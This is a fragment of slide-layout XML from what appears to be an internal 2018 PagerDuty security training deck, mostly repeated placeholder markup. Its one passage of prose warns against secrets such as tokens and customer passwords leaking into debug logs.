          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Another part of managing secrets is to make sure they never appear in places they shouldn't. Logs are typically where this happens by accident. You enable some sort of debug-level logging, and all of a sudden tokens, API keys, and passwords start appearing in log files. Even worse, they're not passwords we control, so we can't just rotate them. They're likely to be customer passwords. Which means we'd have to notify those customers to change their credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We have automation in place to redact anything that even remotely looks like a secret, but it's not perfect and you shouldn't rely on it.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link" TargetMode="Externa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Message (Slate)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457200"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="PagerDuty_logo_WHITE.png"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12823076"/>
            <a:ext cx="2956211" cy="701676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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Heading (Blue)">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703388" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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 Slate">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958453" y="625078"/>
            <a:ext cx="22353968" cy="3036094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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 Slide - Slate">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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7" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</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 Slate">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440352" y="12962776"/>
            <a:ext cx="3430388" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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rowser">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="browser@2x.png" descr="browser@2x.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="112414" y="74414"/>
            <a:ext cx="24159172" cy="15092134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355600" y="1092680"/>
            <a:ext cx="23672800" cy="12801601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="F7F7F7"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="PagerDuty_logo_GREEN.png"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="internal only"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" cap="all" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>internal only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="SECURITY TRAINING, 2018"/>
